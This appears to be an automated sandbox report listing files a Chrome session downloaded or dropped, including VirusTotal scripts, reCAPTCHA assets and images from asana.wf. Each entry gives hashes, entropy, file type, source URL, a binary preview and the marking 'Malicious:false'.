                                                                                                                                                                                                                    SHA-256:0A47A4CC6EFFCA4CAC548D2FC183380399165777FA1002CBE7932808062E28F1
                                                                                                                                                                                                                    SHA-512:83FD3A2FC7EAA922B40BB53BC76A8CC4FFB52DA6007A979C63E10109F015034D1C3272144A8D52A708B12392C1DF7223121FF8392583AC4569E4DF121837695A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/icon.types-zip.5dbd88de5aaca441ade4.js
                                                                                                                                                                                                                    Preview:...........TKo.@...WX..v....94.*5.J..E..8.....H...;k#.hh."......o._.W7..6~?...-l.*.wg.zq.i....<+..?....2.j]...E.(...d...AC.b.t.ha..!.0....PV..rq. T>..Y.xy.-u.i....*1&.z3..|...4h.a.^.x.....|..S.h....n....\M{<...z...4E.|.{E^N.f..-g....*_4g..r.{.2.~].~.E...U..?.z.g0}^#.*k.o...L&`.L..e10..0.5H...4V..n.M...j.b&@P.!)...E,-U.0.%h.b....Z. .l...c.Q[....z.....N0...B.#n.q1j..D.f..>...$.1.$"...!4q.....(gI.......Dw..q..c.........b ...pP.k,...b..-...\.,.H..F....@.r...bA.....Cw$.<.....K.)..a..i..x.}.[t\6".S....;]..^..RV.m<..O"........).`/..s.u!..{.!..m..@.."..sY46.X.....c..L>..)....yn.?.w.....J.......J"*..=..[.....{....Z.#..w..l...:.;.:..w..{!.3..J.i\D]VC.t..p..."..7.....8l...R......0|z...'....^.W6?..\L.......B..k./3...$I&..2.I.I..W..............1...
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 560x373, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):13080
                                                                                                                                                                                                                    Entropy (8bit):7.987134820829888
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:bHZL3XVQS187JOvmiM/QAY0qBTbRTxKj5D+lhXJLoIAf1:lL3WOFvm7/zY3TbRdYohXJe1
                                                                                                                                                                                                                    MD5:116883D2DA0F447AB85349F7DCE20D43
                                                                                                                                                                                                                    SHA1:52EE979D7CD7998307D2F357E3C7EEEA93C75A6D
                                                                                                                                                                                                                    SHA-256:9F998BAB9727CA8AB20189AACEE1A122EA0F17F3920E64127CFACF85A36E6C41
                                                                                                                                                                                                                    SHA-512:BA4A97E633CA3FA7DA5A24F8BCF5E5A59A9F0144FFF8E57D3A3CC66F7CC4522CCDDF4921D7A8C2F1E9B9E9538D587B788E3A707DA555B6AD3FAD0A02A386EA75
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/card-figma-asana-customer.webp
                                                                                                                                                                                                                    Preview:RIFF.3..WEBPVP8 .3...L...*0.u.>.@.I%..&*..8...gm..K....-..y..6.....&../.j.c..]....;.3..S9.....Cx....W.....?....kmq....Ns.>..o....vF...SDv.Y.z..t.a@s..h.\;....2.$w.....<.w......z..[p.../..x......5...>..m[..!..........Dv.U.......L9..d p.........2..4c...K...s.e.!.....fO=b..s..A..>.?..........FB..L. .A..F(.ztc...........c...z.R....j"J..l.b!.F&.1....`..1s..C'.%...#.u....E..{.&.....e..W.......X.....g2...-4......t..S......<$/. ..=[.o....-.,...?>ix.Hv.......EC..Qa...>.....o..E...g.=...Q.'..C.CZb.7:5E...)aJ.]]......h......z.u..O......F".Y..YGe...Q.....B`\..z"..y...)...P.......+..V.....*.4kk.;.....D,p5..<hi>.!......;..q..D...a.g5s...O|........~..#..d...../..R[U.p7..0..]G..?.....<.jm6.~/aA...G...^.!....7"...Y0ON....w.#uM..........[.D_.:.5X....d...Q.........#..+.@..Yp.\...SD.*.q.nI..o....d@<B.3)N.q........=....f-K..O3.?F....r$..;8..X....n.I.2*.......XE.p.1........}...'.W...Hlk(......&...$...wg..d...;.VB.MF..`$..&.Sg.../q.........h.(sN.....)
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):1856
                                                                                                                                                                                                                    Entropy (8bit):4.089901702031411
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:Ix86d2mtM90QX9t9tLSB7SVoxo7GoW0f+Spr/gzVRvD:Ilu0QD9UBKNp/07
                                                                                                                                                                                                                    MD5:F8B6BBC8C40AA784FCD903F13FE7D0AF
                                                                                                                                                                                                                    SHA1:24304334B7C0F2C77B72A26B200511D73404FC6B
                                                                                                                                                                                                                    SHA-256:CD9D5277E4BD00CB842065285E9A983E365AC96BA4156F072378BA43470BBC69
                                                                                                                                                                                                                    SHA-512:5F3F8A9D45AFF27104E1A2CEB9B74B28C98960752732F64D6D39E8E1022CC4F5B823AFA90B3220F7FB9C726907302C519C20976BB7EDF86EDF5AD5BAD4B49D90
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/logo-ratio-40pxheight-Dell.svg
                                                                                                                                                                                                                    Preview:<svg width="150" height="40" viewBox="0 0 150 40" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M75 0C71.0444 0 67.1776 1.17298 63.8886 3.37061C60.5996 5.56824 58.0362 8.69181 56.5224 12.3463C55.0087 16.0009 54.6126 20.0222 55.3843 23.9018C56.156 27.7814 58.0608 31.3451 60.8579 34.1421C63.6549 36.9392 67.2186 38.844 71.0982 39.6157C74.9778 40.3874 78.9992 39.9913 82.6537 38.4776C86.3082 36.9638 89.4318 34.4004 91.6294 31.1114C93.827 27.8224 95 23.9556 95 20C94.9693 14.7051 92.8523 9.63589 89.1082 5.89179C85.3641 2.1477 80.2949 0.0307062 75 0ZM75 37.962C71.4475 37.962 67.9747 36.9085 65.0209 34.9349C62.067 32.9612 59.7648 30.1559 58.4053 26.8738C57.0458 23.5916 56.6901 19.9801 57.3831 16.4958C58.0762 13.0115 59.7869 9.81098 62.299 7.29895C64.811 4.78692 68.0115 3.0762 71.4958 2.38313C74.9801 1.69007 78.5916 2.04577 81.8738 3.40528C85.1559 4.76478 87.9612 7.06701 89.9349 10.0208C91.9086 12.9747 92.962 16.4475 92.962 20C92.9648 22.3596 92.5021 24.6965 91.6004 26.877C90.6987 29.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 22620
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):7363
                                                                                                                                                                                                                    Entropy (8bit):7.971013328075433
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:cNtqOgF0ak7vTPfxK4A1sdXZcMFf8JOg0v7CerM:cNPgF0a4Tc3W9ZLFrv7DM
                                                                                                                                                                                                                    MD5:3FBCC63531BD3B3EA4A241FBC8FC01C7
                                                                                                                                                                                                                    SHA1:76CDAAD30EA22AA434A388826EE9B5FC1A8EE8C4
                                                                                                                                                                                                                    SHA-256:E491B307D38C55DEF19BC672B8461A974A7C477FFAFFEA1319991D5798E4A59D
                                                                                                                                                                                                                    SHA-512:3820615F637B2B4F61E713D6405BF0360F01DA37381D4680178644C8FB5F385416FF62916A96E0DB2D305438CB68A1B8E96CAECDCAA2C1D2DB543DE14B19949E
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/36619.68cafafc7df311d6c6b7.js
                                                                                                                                                                                                                    Preview:...........\{w.6...?..i=dK.l.T%.$....$...:^."A..EjI.*....E...L.x......qy..bN..4.[.,.n.x.F._N...k~.H.fa..............^...:'....e>.so.lu..N1....Y...)=.z.]./.x.o..=?.c..ou<?..I.s....:...F.xlwO.-o.1.D.._.3?...36.%..d.G<-r.._xb....d1c9.....>.r.w... _d.h4*..._...........-.9+.....2..ti7.b.&n...../.H.7,.0..Q...b..e.....i2..Y..$X.6...B...f.F.a.lzn:b..wx.#.v...7(...p..x......./..A..axx.v..$....kA...FQ.V..>q..S.?..u....M.t%y......hs..i....5^.3no..]6......E...o.+..u..N.,`...,H.*.Ly.".XUy.."...O.Q.W...^.....h..^1.M.>-Y...<.....r.A......L.!.-.Y.y.EU.Q.....S...bI....P..J.?.4w.....]37...@.ygav...*.gi...=.z.8.?c.4~.....^S..i1p[~.L.,....;.%..Z......k.....p..}.:B$F.q.O.S..HA..Y.'M...C.j1..s8$G.5.8.a..E..y..F.Z..|?+`..kV...]e..ga...}..{&.t.;.....O.0..s....S...5.0...T...\... M^..=%/...I......H..8-......y..9WK.5....NW......V,,.i..T.z....E..k......0.X|u..F...$d.8oqm....=.5.l>....2..2......*.e..SW3....B..>.G|{....o.....b..<F.q...~.T|..j$...0a/...
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (56412), with no line terminators
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):56412
                                                                                                                                                                                                                    Entropy (8bit):5.907540404138125
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:+LUmmAWTe2uXYp8Mi+yKYlebyBblxRx54PHSGdXXwW7MFWwXVuE2:4UcW6v+0BbchXwW49z2
                                                                                                                                                                                                                    MD5:2C00B9F417B688224937053CD0C284A5
                                                                                                                                                                                                                    SHA1:17B4C18EBC129055DD25F214C3F11E03E9DF2D82
                                                                                                                                                                                                                    SHA-256:1E754B107428162C65A26D399B66DB3DAAEA09616BF8620D9DE4BC689CE48EED
                                                                                                                                                                                                                    SHA-512:8DC644D4C8E6DA600C751975AC4A9E620E26179167A4021DDB1DA81B452ECF420E459DD1C23D1F2E177685B4E1006DBC5C8736024C447D0FF65F75838A785F57
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/styles__ltr.css
                                                                                                                                                                                                                    Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAABIAAAASABGyWs+AAAACXZwQWcAAABUAAADSAC4K4y8AAA4oElEQVR42u2dCZRV1ZX3q5iE4IQIiKQQCKBt0JLEIUZwCCk7pBNFiRMajZrIl9aOLZ8sY4CWdkDbT2McooaAEmNixFhpaYE2dCiLScWiQHCgoGQoGQuhGArKKl7V+c5/n33fO/V4w733nVuheXuv9V/rrnvP2Xud3zvTPee+ewsKxMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExP4OdtlT6ztAbRWvvLy8A3QkwxzH6tBGMMexI
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 38426
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):10671
                                                                                                                                                                                                                    Entropy (8bit):7.976861646119413
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:AGbUyPGG1qsQyCK2pqpCTtLGTOmjXdidVzCcklIkHhzs5OdkokilDRjXViZNkwNH:HbUyuGmNXBRGT1XdidVzLkBQ5OdXki/u
                                                                                                                                                                                                                    MD5:6E8DB224B29EBCBAD8CE3A5468856684
                                                                                                                                                                                                                    SHA1:EEFEB13BFCE7D080FFBCF62CF2E032B973E9203A
                                                                                                                                                                                                                    SHA-256:E6877494C51F3D8DBF4D070F70A23FE7ED086BAD83E5F4157FCA37768170FD16
                                                                                                                                                                                                                    SHA-512:CFF9B9C5AC555D235DC392517B7D3CF4601CD16BCC764A7B9A9AAE0D6562D4E881B7F31A806CE8F43BE200BE8B80F3937C15DBA52A0FF96C89C629913FC7F19F
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/39406.01e4b51877a7f7c287bf.js
                                                                                                                                                                                                                    Preview:...........}{w.....)`$.!6 ...2.8...v..9W.A.$a........}....h..I+.w......YU]..*.,..<...}..h.......t6..n.Yx3...../W.7.e..........}.......\...;.{{.V..n.tO......s|.V..[.{.GG.......=.M...hk..q3......S......;nDO.7...w@?......_{{..x8...#......=......6..u[..P..{.../~.[t...:p...:..n;.Q.[....C....p/.....{...\v.....I.;uc.v.`7~:.M.8.(.G...J....x.E.n7>...z..~...].>M.A....~.N.$m..:.q8l.hjw...4H..y0..wc.VK....A?I.<p..l........a..h.~7..mo..'..c..vZI7....V.m...V.t....5..C.p./_2.8..Y.[x...ml.]..a..j.......?v...eV.9..Af...C..y.....}.d-.nm..7.3...]\8.[...<E. E..H..!Z..I..|i.w_.....[...%... .(...N.Q..]...'...1=...N..).......6H...X...`......`...A4...b`s0.....i0T....zAM.....p....8.........]{..y;...:.n.L...b-M{..d..>.....8.<?...?.xtj..._..kB.27..<..>!.......y.[.k....ae...(..m.zX^/........[B......O..@.9.I.p.F~Z.....3.....E..L.KH]c..............G.....k..~.8P....4...+.5J...?..q.@>..G!..1!......G..'.}"(,......$.D......1.s.....4j.Y....~.=.y...A.K'..`..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):411277
                                                                                                                                                                                                                    Entropy (8bit):3.3505761033835357
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:hijVq0ZRmMDb4HioZ2l9hPxlUELqK02B27hGxz:gqC7F/qQ
                                                                                                                                                                                                                    MD5:119231C09609AC5044C967763B47F114
                                                                                                                                                                                                                    SHA1:61B3767CBDB31D8C3C2398D040ED97C2E5300B3F
                                                                                                                                                                                                                    SHA-256:BA41717A8863919711A3A80B7FFA5E659A50A4BA1DAC29BD43BBE2EC57DC0E89
                                                                                                                                                                                                                    SHA-512:E5A326A8D5F3F5732C9313DC4D7D4F75E0AE4DFA76D24ECDE5F3E58B316701973F64D50946FD143F068880C6DBC935ED6FF6F652CD9701D832A994A0BB63AFE3
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files
                                                                                                                                                                                                                    Preview:{. "data": [. {. "id": "073a876829e5359a224cad1557c1ad8fa8a1136a28567d83fab241b6fe04c25d",. "type": "file",. "links": {. "self": "https://www.virustotal.com/ui/files/073a876829e5359a224cad1557c1ad8fa8a1136a28567d83fab241b6fe04c25d". },. "attributes": {. "md5": "661d3747df0c80fd1ebc233ada66b02b",. "size": 4883,. "type_tags": [],. "reputation": 0,. "times_submitted": 1,. "total_votes": {. "harmless": 0,. "malicious": 0. },. "magic": "data",. "trid": [. {. "file_type": "PrintFox/Pagefox bitmap (640x800)",. "probability": 100.0. }. ],. "meaningful_name": "AppxSignature.p7x",. "type_description": "unknown",.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 595874
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):121683
                                                                                                                                                                                                                    Entropy (8bit):7.997655899941978
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:3072:qLYPZ4H7i7VlC1Nem68xnrpSwzLDR8oVsDwYLDBa7bfNJePU0YJQ:5h4bizGnooFvGkYLtaWP0K
                                                                                                                                                                                                                    MD5:A8878746AB13AF5ED66A1A88BAE2F99E
                                                                                                                                                                                                                    SHA1:ABF630EB03352532D0AB20E5319306A8C14897E2
                                                                                                                                                                                                                    SHA-256:72FA213E0E3D3B735894ED2ED944A9FCAF1205499B616CD8A189876A5D945CE0
                                                                                                                                                                                                                    SHA-512:FEABF0D93808AB78190A61440474DFE7D09350B7C700DD78DEE2E7FE4037C4FA97640952AB472E008EDDFECFC9CA351198E319CEA5641054F5B59C4078AAAA72
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/73581.c40f4c346950a7606c39.js
                                                                                                                                                                                                                    Preview:...........k{...?..|....j.\H........ap`.l.._...v{......t....Ov~U%...;.....z.5...$.Ju..4V^.DA/.lUc5<j......;..?.$...p...9.>.~...L.A......V...w.o6U...I'...t.K.p\U..H%.h.....n......Z..D.G..@.[.n..e.}n.Da.R.F..1..q.....kK>Uy'cz...O.....|.l.?.$.<t...U..7............*.G.q.l....n...0.N..V"..%.5T#5N*............O.*.X..X..a8..$. ~..c.......l......(...[.j...7./j>..T...LD....!O5z..I.I.1.L.U.._0[F....Z-.&t^......f.+.G7<V....U.NT.......^.G.0Q...],Ow.B..{..t."Z-..X...|........=...\./....".A:......;f........7/(.[.h....t0f..4.w...V.....!mD.mX;O;:....pN.z....Y.t..n-.LX'L/.}.\..C...i%.......u.8-epT....I8b....4..'...c.....<..AsxQ..2X..O..&.6...~.n.(.....j..?..Qht.04.....s..=C..y..9AS>.o.C....@E.A........o.<.q+. .z.AG..p....D..&....W.a...d....A..zcu.=..0.V..(N.Nt..1N.x.N.}.....O.,... ...O{.AQ:..d..A..<.~k.....$......l...7.=..\.Au....7.[A......].....F........+5..?.._.\.....v..........5.....M...A............E....W..]j.z...~z.c....*.z....S..........e%D.Sf}..q.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 560x373, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):9052
                                                                                                                                                                                                                    Entropy (8bit):7.980303064174038
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:xJJ0lo3i9Yw+4OWpoHysYSj0km38ShICjaWr4Jeeh8uGzL6Ateiy:/Jmoy9V+USHysYa0km3LmSeeFuOJw
                                                                                                                                                                                                                    MD5:A6778676E30B66219234574CFD07FCBA
                                                                                                                                                                                                                    SHA1:48D1262DF15B57171E5E596C5ED498450F36AEBD
                                                                                                                                                                                                                    SHA-256:B8FF4EA74F70D06FB28DFF668E4DAECCD171850426F17375E355577D02F0C320
                                                                                                                                                                                                                    SHA-512:41A2C24D523F32F3E0830352DB21372635C9AC7FBD43C7F957041939CE323D32341AF5B2685ADF40A74A0455F59985521C8BA73D638471F9854C82BFD736D954
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFFT#..WEBPVP8 H#..P....*0.u.>.F.J%.#!.sZ@...in..N9s2v.....=...]...i..Z......wJ.F..2.x1E...|.f...")..u.k.45.6........L,.IJ..B.S.....4nG.....Q.s..i.L...eq.s.mRJ;...N-..7.M.u"}.N6..[.fm..w..v....t.A..5]..(.q.....d...C..fM.....aI..Zm.=>..I.3..g{..\.>.p./..*BU). U....Wi.,...a 0......PR`.A..((~ ..w............PTlE..y...Z.95bP.W.....<?.uA..3.c..1. (.\.n..l~..4..,.M.zc..n..B...c.jZ..t..(..zV.....".....8..@|-@...jj....4....}AA.9.......u.[h.Q..q.!.{...e..3......K.(..H.U.G.E.nn.)....`....a9K.p.MX.....QX..d...!...1.:#t..#2z..C....OpX........n.{S......t.0i.....6...8}...jbU.K:.S.......n...t.n....8..2G..........`Z.4p%.T....~.....Q.T.....^......(./.]....w..ED?s....T..z h.......pwJ.q?.O.....v~I..=...^\....Wy.V..f&.2dA.*..-oiI...k.A..K..d.\..Q0B....p.5......w...ir...6.8.R"....`n..q..3.....2../.8..*[....m.%..G.......q..e>..Z.P.H......N......w.........2:..|...F...'.......(~U.....=..|i...IF..Z..g.`M.8b[b,X<..'.....z.>.5!.7_q..c...5......y<lp....P.8.+J9+.`
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 26061
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):8931
                                                                                                                                                                                                                    Entropy (8bit):7.978517906456892
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:ga03C6ryNgHVt0SG4aWBt91WBWkuzi0+rYQIZEQYdADuJdJv15be:BpNmVt0MD9yuu1rYQ3RAD+dJq
                                                                                                                                                                                                                    MD5:E982816784C40FE5B42531451798E7C2
                                                                                                                                                                                                                    SHA1:E97AAF1CE3B08540E16DC267407A677AC662ABC0
                                                                                                                                                                                                                    SHA-256:3F3FF5F1764D878E8795F515CA7AA6F76BE33C3E68750EB83C91AEBBD3718D93
                                                                                                                                                                                                                    SHA-512:FB92B91D00E600B85F19D18829E0EF695A252422F9F195067F1DD1B149552FA621608904F5DFA07E93E32F29886456778F27C32AE52B95A186DA239638D89B34
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/86082.7555cf018c5a216147a4.js
                                                                                                                                                                                                                    Preview:...........}kw.F....W.L.Cx...D](.Nb;g|N....~.VG........%4..>U..h.....~{..".R]]].j .U....q.:o.j>...h..o^.V..my.J..q...........b..8=....^..889.....I.(......`.?9...m..A.._.o...y...zv..)}..... ...}<...+.8.....:.9..t...$K.V...+.8.^-TZ..\...,(..... ]....0{.......et...._.l....*.y.,..M....d.ne<.5...K.M..j:..O[....h..Y.../.z.m....9.?.b..x.4.a.<~1..a..../..O..M.H.?H^............<W.*O=.?}Z<}.w9Q.$Uf.z^Pl....x.....K.N./.~J.7sE.\.e\&c.d..<.U....E..d.*-.z...N....M..*...r...,W.<~V..~.........w.[.;....<+_<?....'?. ...#...a.s0..l..mB/...`....o....^o..`B}eF.A..k..Y2.:~.....UQf.M...-.U....l...#...s..w. .& .z.. j.*[>...A.,.m.s|.J....~...z.&.w.{....JM..T...s..(h.&8=.....+f..8.8...`......1...x............[.......=..,..%..;;......3H....v.f....{..... ....6..?..#....#h.~0bP...,i,........S?X.S..=..k|<........gG..Br.L...>...W...U.!x.|.......7...../..........z......AO=1........JK...#E.Z..>.F..a..a.p..6.wP...o....Z..WPl....C.....9...x.[.v....lN.......N"...##...e..ZW.g#
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 560x373, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):16548
                                                                                                                                                                                                                    Entropy (8bit):7.988647764925039
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:nl/cWTILCZTIWBCxutYdh7aR+clC6qjxY:nl/cW8LCZkWBCktuaRlCzu
                                                                                                                                                                                                                    MD5:60861A57D59EC609E542946C40439859
                                                                                                                                                                                                                    SHA1:E380FD9D9EE41E4B4233F02CC75484BB443C5FEC
                                                                                                                                                                                                                    SHA-256:92CC31ED3858EDF7F506B164F99A845DC1149EB7D204C3E24E55A0046683CC09
                                                                                                                                                                                                                    SHA-512:46F56D7159B7C3C8FE4B2BF597EC44C9CD402B9CDE72975CF45F809F0C3E2483533D784811AF05F179441DBE98B6E4257395666360BF9CA71286A62DE4FA5F2A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/card-hubspot.webp
                                                                                                                                                                                                                    Preview:RIFF.@..WEBPVP8 .@..p7...*0.u.>.@.K..&,..;A...gn..3.Nw7p.O..|I."...*...........g.?..}......u8[./..;.s..P...A....K.[.......d......_.w....f....A..O_Y4.."3I......2..]....8...x.AK^.......%.[............_.F..X.v...6..nNP......e....D_U....di...j..B.K4 .=.2.).._.8s...e.u:.(....>.......Pu..q.>.W.K......"...B%....(T.iy...t..m...n.|.......}`.pE*.gg.WS*p.*.......xj...#.+.>f&.l....xZ.....,.E..:...c.....P..rxdL..'.j...a.H.... .....y.w........mI..(.........P.n.....f.g.......,d.v..p6..e...._..xH..Dv071.....P..Z..n..N[3HX.N&+O...Rm0.w...n......EF...ds.<....[."q,>.W..3.....{gs..iL...h..&+.NRH.;.5...V8o:....S*.H.....=....+.K?...7.B.-BIq+...K.;...[..j..........}%....kf|...y..22........u.>...3...y..I....m.nzQ.....u.P.=.(.m..DX........DC.K.".#V,.e.....D.P.z...8..9v'....:...1..L._..R.B...#C.../.4....%...&......pUY........d...B...<..Z.s.u}.<.. ......]...nI.L...C..S..6....S..Y.*2...........zC.G...~ZD1..T).U.:..h....9.)E.[.?..cm...TV.e...%Y.u...71e...b\......>}.<..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 19726
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):6802
                                                                                                                                                                                                                    Entropy (8bit):7.972095141963808
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:qJaneyk9YabrHJpglCNPfizj6crUbiy2x:qJaSvgxrk2x
                                                                                                                                                                                                                    MD5:51F629859DA2870E81E865AF6F953892
                                                                                                                                                                                                                    SHA1:1228D22747754B90CFE3305FB952B21898194156
                                                                                                                                                                                                                    SHA-256:600C9EB7013CC87448FEB377E02F748BA45E96197944516474AC5C2D8615034A
                                                                                                                                                                                                                    SHA-512:7922C86ACDBBC922228E1831C88AC95064E777BF5E6C31F7A4F7BC43B7B42A3B40BAF88C27F97AE424DFE43797C139C52BE578536507621C79892733D8A99251
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/98738.02d0b9fc2f580f85da17.js
                                                                                                                                                                                                                    Preview:...........\{w....~....@.$.6`pp.8N...8.v.Z.>^TH.......%|...{f.H`..{nh1.s.~.=[....<...vT.D4q..x..7'.e|s....h..........b...WW......zn.;l..W.^j%...u:.....A....a=..z....{..~..c....}.{..i......a...o.>....[m...:l...a..9..1F....n..xR....j.J.8..V...y.}l,.h.......n...ni.t.4.".[....#.....o.K..>.........d..O..;..........~o............p...<Lb..;i0z2..K.....D<.g@D.|.....(....dx6.Y..;...].1M."..^..O.E..u.. 9.'.Z.Ck.a.....:...s.=.i....@.I........HD`..6..y.\....a..s.F=..W.u..z<..).z......0.........Q*.e.[...,~.L.2..0...j.....?....2K..".2k...Y.I..^....*[.=u.u..6.|.f.?.....Z}K...I.......k'h.>......p1N.4....O.?\....2.J...H6.A.....p.....r.w4I.q..l.A.G.....!..e..Z.[.0`....pX.F..=.. .m..V......V[g....E0f.C$2.).p.\..].n.v........F.j..h.?^7...E.F....i.sw.e..<i.....1.q..3A.!..,...Td..P.f..D......f.{9.{B..\z.L....."W..q.(.?..m._..x?. .]7...0.1l~2_.J../..-.ps4..l.3...M.~H.7..8..0....7.y....."..8.k1.Q.&.|\..goH... L!.DM.\......,....@H<...6.G^|Sk.S.H.."I.wa|S...m.O..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
